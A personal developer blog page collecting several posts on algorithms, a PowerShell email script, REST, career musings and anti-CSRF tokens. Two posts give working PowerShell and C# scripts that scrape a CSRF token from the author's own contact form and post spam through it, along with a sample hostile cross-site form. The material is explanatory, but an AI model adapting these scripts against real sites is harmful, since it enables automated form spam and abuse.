Adam.Kahtava.com / AdamDotCom

I go for a walk every day (yeah-yeah, I’ll be a mall walker one day). My route takes me by a series of automated parking payment machines - the ones where you punch in your license plate along with a parking quadrant. Surprisingly enough, these machines provide endless comedic relief as people talk, grumble, and curse these inanimate objects - some people go as far as to physically assault them, jam their keys in them, give ‘em a good kick. It’s funny to watch a level headed business man break his cool as he uses a car key to fish around in the coin slot while at the same time, having a few words with a machine. My favorite responses are the talkers; grumbling about the price of parking and technology in general. I’m sure they know the machine can’t hear them, but yet they climb on the soapbox and give the box of wires a piece of their mind.

Algorithm Analysis (Asymptotic Complexity / Big O Notation) courses are the bane of computer science students everywhere. These courses were mandatory, dry, and lacked real world pragmatism for students who just wanted to get stuff done. Well, that’s what we told ourselves; that’s the theory we presented to our friends - we were convinced that framework vendors or the hoogie-boogie man would figure out the most efficient way to performance tune / compile our code. We looked to Sun, Microsoft, or IBM to figure out the details. In truth we were lazy-naive students and Algorithm Analysis was tougher than we’d like to admit - much harder than programming in 4th generation programming languages, more difficult than computer theory, or operating system theory.

As I brush up Algorithm Analysis I found these perspectives interesting:

to be a good programmer, you just program ever day for two years … to be a world-class programmer, you can program every day for ten years, or you can program every day for two years and take an algorithms class - Introduction - Analysis of Algorithms, Insertion Sort, Mergesort

Having a solid base of algorithmic knowledge and technique is one characteristic that separates the truly skilled programmers from the novices. With modern computing technology, you can accomplish some tasks without knowing much about algorithms, but with a good background in algorithms, you can do much, much more - Introduction to Algorithms, Second Edition

It’s unfortunate that our professors never mentioned that Algorithm Analysis would be an integral part of academic type interviews and a prerequisite for getting a job at Google, but then again who would have listened?

Here’s an example on how to send email with attachments via PowerShell:

# A Mailer script that makes use of System.Net to send email with attachments
#
# Sample usage:
#  PS> Send-Mail-With-Attachment 'email@domain.com' 'Hello world!' 'Filename.txt'

function global:Send-Mail-With-Attachment($to, $subject, $file){

  $filenameAndPath = (Resolve-Path .\$file).ToString()
  $from = 'Automated Powershell Mailer'

  [void][Reflection.Assembly]::LoadWithPartialName('System.Net') | out-null

  $message = New-Object System.Net.Mail.MailMessage($from, $to, $subject, $subject)
  $attachment = New-Object System.Net.Mail.Attachment($filenameAndPath, 'text/plain')
  $message.Attachments.Add($attachment)

  $smtpClient = New-Object System.Net.Mail.SmtpClient
  $smtpClient.host = 'mail.domain.com'
  $smtpClient.Send($message)

}

Contribute, view, or download the script here: Mailer.ps1

The most popular conception of creativity is that it’s something to do with the arts.

Nonsense. - Paul Arden, It’s Not How Good You Are, It’s How Good You Wan’t To Be.

This year marks a new decade for me (I’m saying goodbye to the late 20’s). According to Arden’s Creative Circle this blog was written during my era of Maturity and for the next 10 years I’ll be Hell Bent On Success. Thanks for putting up with my growing pains and griping.

As a youngster I was encouraged to: “Find work that you love and do what makes you happy.” Ironically, this sage advice was usually delivered by the unhappy, unemployed, or paranoid (paranoid that the government was stealing their money, unhappy with the uncertainty of not working, or unemployed because keeping work in small remote economies is tough). It’s also fair to mention that this piece of advice was usually followed by: “Get a trade. You need a trade!” This was probably great advice a couple decades ago, or if you’re working in remote communities, but less relevant in today’s world. I loosely followed this advice through my younger years and I remember constantly being frustrated when work inevitably lost its fun. Thankfully, I eventually realized that work is work (if work was fun we’d just call it fun, then we’d be preoccupied with having work, not fun). Anyhow, I sympathize with today’s youngsters who are wrestling with this same conundrum - being told one thing, but experiencing a different reality in the real world. My words of advice today would be to: “get experience, work, do whatever you can, build a resume, go to school, and you’ll eventually find work that you love. Oh, and don’t look solely to work for happiness.”

Today I do find my work fun, but I couldn’t have got here without the experience I gained while plowing through boring jobs (like working the assembly line, tree planting, or digging outhouse pits). In order to find the job you love you need to start gaining experience now.

I ported the example of how to hack an Anti CRSF Token protected form - previously shown in my post What Are Anti Cross-site Request Forgery Tokens And What Are They Good For? - to PowerShell.

How to hack an Anti CRSF Token from PowerShell

function global:spam-adamdotcom(){

  # Load the assembly containing WebClientWithCookies and RegexUtilities
  [Reflection.Assembly]::LoadFile((Resolve-Path "AdamDotCom.Common.Service.dll")) | out-null

  # create a new instance of the HTTP Web Client that supports cookies
  $webClient = New-Object AdamDotCom.Common.Service.Utilities.WebClientWithCookies

  # download the page that contains the Anti CRSF Token
  [void] $webClient.DownloadData("http://adam.kahtava.com/contact");

  # use a regular expression to grab the Anti CRSF Token
  #  - this is an MVC site so we're looking for a token named "RequestVerificationToken"
  $regexMatch = (New-Object Regex("RequestVerificationToken=(?<CRSF_Token>[^;]+)"))
                .Match($webClient.ResponseHeaders["Set-Cookie"])

  # parse out the Anti CRSF Token
  $antiCrsfToken = [AdamDotCom.Common.Service.Utilities.RegexUtilities]
                   ::GetTokenString($regexMatch, "CRSF_Token")

  write-host "`nYour Anti CRSF Token is: " $antiCrsfToken

  # construct the message including the Anti CSRF Token
  $message = "__RequestVerificationToken=" + [System.Web.HttpUtility]::UrlEncode($antiCrsfToken) +
             "&fromName=Johnathon Fink" +
             "&fromAddress=prancesw@rmcres.com" +
             "&subject=Call for your diploma now" +
             "&body=Is your lack of a degree..."

  # send spam-spam-spam
  $webClient.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
  [void] $webClient.UploadData("http://adam.kahtava.com/contact/send", "POST",
                              ([System.Text.Encoding]::UTF8.GetBytes($message)));

  write-host "`nSuccess!!! Your spam has been sent.`n"
}

To run this script:

1. Download the script
2. Run PowerShell
3. Load the script: PS > .\Automated-AntiCSRF-Authentication-Script.ps1
4. Start sending spam-spam-spam: PS > spam-adamdotcom

Here’s the output as seen on my machine:

PS C:\> spam-adamdotcom

Your Anti CRSF Token is:  f54ZlHS3L1Xyl65dYd1uYYh90ygNKYmCswXJUnr0GYtgcrJdJILsQ2jyFotzc10L

Success!!! Your spam has been sent.

This example uses a derivation of the .NET Framework’s Web Client class but with Cookies enabled, so it depends on the AdamDotCom.Common.Service.dll assembly (browse the source here). This dependency can be automatically resolved by issuing the download-client function that’s also found within the PowerShell script.

Contribute, view, or download the openly available script here: Automated-AntiCSRF-Authentication-Script.ps1

RESTful web services are all the rage these days, and for good reason. Many web based MVC frameworks depend on REST. Here’s a crash course on what RESTful web services are and aren’t.

REST stands for Representational state transfer. REST is not an architecture, instead it’s a set of design criteria. RESTfulness and RESTful web service try to make use of the full gambit of HTTP Methods (GET, PUT, POST, DELETE, OPTIONS, and HEAD), and try to expose every resource or operation in a meaningful URI / URL. RESTful web services are intuitive, and work similar to the way the human web works (meaningful semantic data is returned to the client, resources link to other resources, microformats are employed, and so on).

Qualities associated with RESTfulness:

• RESTful is the the way the human web works - where the data returned by services can be easily understood by humans (or robots) and usually contain links to other resources
• RESTful web services use varying response formats. Common formats include: XHTML pages, XHTML microformats, JSON, XML, ad-hoc HTML, JavaScript, or build your own
• RESTful web services depend on meaningful URIs. These URIs can contain scoping information, but shouldn’t contain query requests. For example: when searching for ‘kumquat’ on Google you’re redirected to http://www.google.com/search?q=kumquat where your search query is present in the URI. Whereas a URI like http://www.google.com/search/kumquat/ specifies the search parameters within the URI - this is not recommended as it implies some predictability, search results are unpredictable
• RESTful web services also use query variables as inputs to algorithms
• RESTful web services expose a URI for every piece of data the client may want to operate on
• RESTful web services make use of HTTP methods (GET, PUT, POST, DELETE, OPTIONS, and HEAD)
• RESTful web services don’t keep the state on the server (that’s the client’s job), they don’t like cookies, and don’t like sessions
• RESTful web services make use of HTTP Headers

Examples of RESTful web services:

• Amazon S3
• Most of Yahoo!’s web services
• The Atom protocol

Qualities that are not RESTful:

• Most SOAP or other RPC-Style Architectures where XML messages are placed in the HTTP Body
• Frameworks that depend heavily on overloaded POSTs and XML (See Safety, Idempotence, and the Resource-Oriented Architecture for more information)
• Most big corporate web service frameworks are not RESTful. Some frameworks like WCF try to provide REST like functionality on top of a SOAP based API, but these add-ons can be obtuse and unRESTful.

Examples of unRESTful web services:

• The XML-RPC Flickr API
• The SOAP Flickr API
• The REST Flickr API - although the name implis REST, this API is designed more like an XML-RPC
• The delicious API

The growing popularity of web based MVC frameworks is providing a welcomed push towards RESTfulness and the simplicity that it brings, because working with the grain of the web (REST) makes life simpler and more semantically meaningful too. If you want to learn more about RESTful web services then check out Restful Web Services by Leonard Richardson and Sam Ruby.

Like a straight ‘A’ student you’ll find me upfront and center, pencil in hand, when someone describes the traits of my demographic group. I fall somewhere in the Generation X / Y / Millennial demographic group (the boundary varies widely depending on what source you cite). I mean let’s face it, who doesn’t like to read about how our droogs are perceived? Wait a … this could be another manifestation of Generation X / Y / Millennial narcissism others have been writing about. Crap!

When hearing about the traits of our demographic group, I question how unique the traits associated with our group are. It seems that these traits could be common knowledge to smart people everywhere (regardless of demographic segmentation), but then again, this could be my squeaky Generation X / Y / Millennial voice discounting the other demographics (yet again).

I thought Andy Hunt had an accurate description for our demographic:

[Generation Xers are] free agents, with an inherent distrust of institutions … Fiercely individualistic, and perhaps a bit on the dark side, they’ll just quit and move on if there’s a problem at work. They resist being labeled at all costs … They are quite pragmatic, working for a positive outcome regardless of any particular ideology or approach. - Pragmatic Thinking and Learning: Refactor Your Wetware

I’d agree, an inherent distrust of institutions is a common trait in our demographic. It could be that we’re immature and this tendency could wane as we grow older, or it could be a permanent scar stemming from our observations - many of us watched our elders (some with perceived jobs-for-life) jaded and unemployed in the 80’s, then living through the uncertainly that prevailed in the following years.

Others have mentioned that we:

would prefer to work for companies that give them opportunities to contribute their talents to nonprofit organizations. - Volunteering as a Benefit

But then again, who wouldn’t like to work for company that encouraged contributions to nonprofits and pet projects?

Yet others have noted that we:

demand to be communicated to in a direct, honest and transparent way … are “‘immediate driven” and quite keen to live their lives right now, rather than adhering to the old Protestant work ethic that suggests you can only reap the rewards of life after you have worked hard and basically sold your soul to your employer. - How to turn on Generation Y

Yup, that sounds fair. We expect transparency in the age of information. Continuing with that thought, it’s also been said that:

[we] view time as a currency … not to be wasted … They want to get the job done, then put it behind them and enjoy life. - Retaining youth

Again, seems a bit obvious. We’re not lazy, but we’ve seen our elders do a lot of weird stuff as they go through their midlife crisis - maybe if they didn’t put off living in the name of work they would have maintained more sanity.

It’s also been said that we:

prefer to dress as casual as possible and work with mobile gadgets or laptops in comfortable, creative spaces. - CareerNews: Tuesday, May 22, 2007

What demographic group doesn’t like to be comfortable while working? Our attire should be an extension of workplace ergonomics - we’re told to lift heavy object with your legs (not your back), and use ergonomically correct equipment. Wearing comfortable clothes and using gadgets should be a natural extension.

In general, I think our generation strives to work smarter (not necessarily longer hours), we try to atain a healthy work-life balance, and a number of us value experiences over owning stuff. I think smart people from other demographics have been doing the same things for years, but what do I know, I’m just another Generation X / Y / Millennial.

I was chatting with a Flash Developer turned Web Developer. When asked why he made the transition, he predicted that HTML 5 and the evolution of the web thereafter would lessen the demand for Flash Developers (possibly making them obsolete) and that moving towards a Web Developer / Generalist is an investment for the future. I thought that was an interesting perspective. It’s not far fetched to predict that the open web will replace proprietary browser plug-ins - in many cases digital content has already replaced print.

Anti Cross-site Request Forgery Tokens help prevent Cross-site Request Forgery (CSRF) also known as XSRF - pronounced “sea-surf” - and are usually implemented through a hidden HTML form element that contains a unique ID. This ID is passed along with subsequent requests for data and validated on the server. Anti CSRF Tokens try to ensure the identity of the user. They aren’t a replacement for CAPTCHAs and don’t prevent robots or web scrapers from manipulating your site - as you’ll soon see.

Why use an Anti CRSF Token?

An overly simple example: If I didn’t use an Anti Forgery Token on my contact page (see the source code: View or Controller), a Spammer could POST data directly against my contact form and potentially drown me with spam.

Here’s a hypothetical form created by an evil Spammer. This form is hosted on http://spammer.com (not my site):

<form action="http://adam.kahtava.com/contact/send" method="POST">
  <input name="fromName" type="text" value="Johnathon Fink" />
  <input name="fromAddress" type="text" value="prancesw@rmcres.com" />
  <input name="subject" type="text" value="Call for your diploma now" />
  <textarea name="body">Is your lack of a degree...</textarea>
  ...
</form>

Again, note that the form action contains a reference to my site (even though it is hosted on another site).

Now, imagine this was a form prompting a user for their username and password. These credentials could be maliciously stored while the user successfully authenticates and is then redirected to the site they thought they were visiting - the way phishing usually works.

After adding an Anti CRSF Token to my contact form, a Spammer can’t access my form remotely (at least not without the token). My contact form with it’s Anti CRSF Token:

<form action="/contact/send" method="post" name="contact">
  <input name="__RequestVerificationToken" type="hidden" value="0sAqY1ZKb+Qia4..." />
  <input name="fromName" ...

Note the presence of the RequestVerificationToken.

Said Spammer, can’t abuse my form without including the unique token. Technically speaking the Spammer can still abuse my form, but he now needs to:

• Request (GET) my contact form
• Parse out the Anti CRSF Token
• POST their spam into my contact form along with the token

This is pretty easy to do if you have an implementation of a HTTP Client library that supports cookies.

How to hack an Anti CRSF Token protected form

Using an extended instance of .NETs Web Client here’s how our Spammer could circumvent my Anti CRSF Token.

The Spamming script by that wascaly Spammer:

// create a new HTTP Web Client that supports cookies
var webClient = new WebClientWithCookies();

//download my contact page containing the Anti CRSF Token
webClient = webClient.DownloadData("http://adam.kahtava.com/contact");

//parse out the Anti CRSF Token
var antiCrsfToken = RegexUtilities.GetTokenString(
                      new Regex("__RequestVerificationToken=(?<CRSF_Token>[^;]+)")
                      .Match(webClient.ResponseHeaders["Set-Cookie"]), "CRSF_Token");

//now the Spammer can drown me in spam-spam-spam
// by scraping my Anti CRSF Token and posting it into my form
webClient.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
byte[] response = webClient.UploadData("http://adam.kahtava.com/contact/send", "POST",
                            Encoding.UTF8.GetBytes(
                              "__RequestVerificationToken=" + antiCrsfToken +
                              "&fromName=\"Johnathon Fink\"" +
                              "&fromAddress=\"prancesw@rmcres.com\"" +
                              "&subject=\"Call for your diploma now\"" +
                              "&body=\"Is your lack of a degree...\""));

The Spammer is back at their old tricks sending me more Spam. ARGH!

What’s the use of an Anti CRSF Token?

Anti CRSF Tokens help prevent phishing attacks. They aren’t meant to prevent spammers or Dr Robotnik and his robots (or web scrapers) from running automated scripts against your web application. Keep in mind, that if your site suffers from other XSS vulnerabilities (where the privacy of your cookies or sessions are compromised) then Anti CRSF Tokens don’t work at all.

Read more about how Anti CRSF Tokens work here: Prevent Cross-Site Request Forgery (CSRF) using ASP.NET MVC’s AntiForgeryToken() helper or learn more about Cross-Site Request Forgery at: The Cross-Site Request Forgery (CSRF/XSRF) FAQ.